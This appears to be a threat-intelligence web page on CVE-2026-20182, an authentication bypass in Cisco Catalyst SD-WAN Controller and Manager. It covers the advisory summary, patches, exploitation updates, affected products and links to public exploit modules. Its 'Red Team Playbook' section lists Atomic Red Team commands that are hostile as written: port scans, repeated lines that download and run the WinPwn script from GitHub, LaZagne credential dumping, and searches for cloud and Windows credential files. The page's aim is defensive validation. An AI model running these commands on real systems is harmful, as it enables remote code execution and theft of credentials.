CVE-2026-20182
Overview
This vulnerability is an authentication bypass in the peering authentication mechanism of Cisco Catalyst SD-WAN Controller and Manager. The root cause lies in improper validation during the control connection handshaking process, allowing crafted requests to circumvent authentication checks. The affected component is the peering authentication feature responsible for establishing secure control connections within the SD-WAN fabric.
Vulnerability Description
May 2026: This security advisory provides the details and fix information for a vulnerability that was discovered and fixed after the was disclosed in February 2026. This new advisory is for a new vulnerability in the control connection handshaking. The section of this advisory includes Show Control Connections guidance to help with system checks. A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, and Cisco Catalyst SD-WAN Validator, formerly SD-WAN vBond, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system. This vulnerability exists because the peering authentication mechanism in an affected system is not working properly. An attacker could exploit this vulnerability by sending crafted requests to the affected system. A successful exploit could allow the attacker to log in to an affected Cisco Catalyst SD-WAN Controller as an internal, high-privileged, non-root user account. Using this account, the attacker could access NETCONF, which would then allow the attacker to manipulate network configuration for the SD-WAN fabric.
Impact
An unauthenticated remote attacker can exploit this vulnerability without any user interaction or prior access, gaining administrative-level privileges on the affected SD-WAN Controller or Manager. This includes the ability to access and manipulate network configurations via NETCONF, potentially disrupting network operations or enabling further lateral movement within the environment. The attacker effectively gains control over critical SD-WAN fabric components, leading to significant operational and security risks for organizations relying on these systems.
Solution
Cisco has released patches addressing this vulnerability in Cisco Catalyst SD-WAN Manager and Controller as detailed in their security advisories (cisco-sa-sdwan-rpa2-v69WY2SW and cisco-sa-sdwan-rpa-EHchtZk). Administrators should apply the updates corresponding to their product versions as specified in these advisories. Detailed patch instructions and version information are available at Cisco’s official security advisory pages linked in the references.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical vulnerability has been identified in the peering authentication mechanism of the Cisco Catalyst SD-WAN Controller and Cisco Catalyst SD-WAN Manager. This flaw arises from improper functioning of the authentication process, which allows an unauthenticated remote attacker to bypass security measures and gain administrative privileges on the affected systems. The vulnerability is particularly concerning due to its potential for exploitation through crafted requests, enabling attackers to log in as high-privileged non-root users. Once access is obtained, the attacker can leverage the NETCONF protocol to manipulate network configurations, posing significant risks to the integrity and availability of the SD-WAN fabric.
Attack vectors for this vulnerability are notably straightforward, as they rely on the ability of an attacker to send specially crafted requests to the affected devices. Given that the authentication mechanism is compromised, attackers do not need to possess valid credentials to gain access. This ease of exploitation can lead to various scenarios, including unauthorized configuration changes, data exfiltration, or even the deployment of malicious payloads within the network. The implications of such actions can be severe, potentially allowing attackers to disrupt services, compromise sensitive data, or establish persistent access for future attacks.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Cisco's SD-WAN solutions for their network infrastructure. The ability for an attacker to gain administrative access can lead to widespread disruption, loss of data integrity, and significant financial repercussions. Businesses may face regulatory scrutiny, reputational damage, and operational downtime as a result of successful exploitation. Moreover, the high CVSS score indicates that this vulnerability poses an extreme risk, necessitating immediate attention from security teams to mitigate potential threats.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected systems is crucial, as vendors typically release fixes to address known vulnerabilities. Additionally, organizations should employ robust monitoring solutions to detect unusual activity within their network, particularly focusing on authentication attempts and configuration changes. Implementing strict access controls and network segmentation can also help limit the potential impact of an exploit, ensuring that even if an attacker gains access, their ability to move laterally within the network is restricted.
In conclusion, the vulnerability in the peering authentication mechanism of Cisco's SD-WAN products presents a significant threat to network security. The ease of exploitation, coupled with the potential for severe consequences, underscores the importance of proactive security measures. Organizations must prioritize detection and mitigation strategies to safeguard their infrastructure against this and similar vulnerabilities, ensuring the resilience and integrity of their network environments.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-20182, highlighted by its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog with a critical CVSS score of 10.0. This formal recognition underscores the vulnerability’s elevated risk posture and mandates expedited mitigation efforts by affected organizations. Our telemetry indicates emerging associations with the ransomware group Akira, signaling a potential shift toward more aggressive exploitation tactics that could leverage this flaw for initial access or lateral movement within compromised networks. Although no new exploit code has been publicly disclosed, the convergence of increased detection frequency, KEV listing, and ransomware linkage significantly raises the threat level. Defenders should interpret these developments as a clear indication that adversaries are actively targeting this vulnerability, thereby increasing the urgency for detection and containment capabilities within Cisco Catalyst SD-WAN environments.
Update 2 — May 22, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-20182, accompanied by the emergence of new publicly available proof-of-concept exploit code and a Metasploit module. This development significantly lowers the technical barrier for adversaries to exploit the authentication bypass vulnerability in Cisco Catalyst SD-WAN Controllers. Our telemetry indicates a substantial increase in exploitation attempts, correlating with the vulnerability’s recent inclusion in the Known Exploited Vulnerabilities (KEV) catalog and a high EPSS score, underscoring its growing attractiveness to threat actors. Although ransomware groups have not been definitively linked to this vulnerability, the presence of the Akira group in related intelligence suggests potential for future ransomware exploitation. The expanded exploit landscape and increased detection frequency elevate the threat level from high to critical, signaling that adversaries are rapidly operationalizing this vulnerability for persistent access and lateral movement within targeted networks.
Update 3 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-20182, with telemetry indicating a substantial surge in detection frequency. This increase coincides with the emergence of new proof-of-concept exploits and the integration of a Metasploit module that automates the authentication bypass, significantly lowering the barrier for adversaries to achieve persistent access. The EPSS score has risen further, reflecting growing attacker interest and operationalization. Although ransomware groups have not yet been conclusively linked to active exploitation, the continued association with the Akira group and the vulnerability’s inclusion in the KEV catalog underscore its potential as a vector for future ransomware campaigns. For defenders, this development signals an urgent need to prioritize monitoring and response efforts, as threat actors are rapidly leveraging this vulnerability to gain footholds and maintain persistence within targeted SD-WAN environments. Consequently, the threat level has escalated to critical, emphasizing the heightened risk posed by increasingly sophisticated and accessible exploitation tools.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | 20.12.7 |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:20.12.7:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vbond Orchestrator | All |
cpe:2.3:a:cisco:sd-wan_vbond_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vbond Orchestrator | 20.12.7 |
cpe:2.3:a:cisco:sd-wan_vbond_orchestrator:20.12.7:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vsmart Controller | All |
cpe:2.3:a:cisco:sd-wan_vsmart_controller:*:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vsmart Controller | 20.12.7 |
cpe:2.3:a:cisco:sd-wan_vsmart_controller:20.12.7:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cisco Catalyst SD-WAN Controller vHub Authentication Bypass
auxiliary/admin/networking/cisco_sdwan_vhub_auth_bypass
|
sfewer-r7, Crypto-Cat | Unknown | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
portbuster1337/CVE-2026-20182
CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass (CVSS 10.0)
|
portbuster1337 | 3 | 0 | 2026-05-22 | View |
|
Nxploited/CVE-2026-20182
Cisco Catalyst SD-WAN Peering Authentication Bypass
|
Nxploited | 1 | 0 | 2026-05-26 | View |
|
HORKimhab/CVE-2026-20182
CVE-2026-20182
|
HORKimhab | 0 | 0 | 2026-05-24 | View |
|
fangbarristerbar/CVE-2026-20182-POC
CVE-2026-20182 exp - higher success rate + persistence.
|
fangbarristerbar | 0 | 0 | 2026-05-15 | View |
Threat Feed
25 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-20182 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-20182 |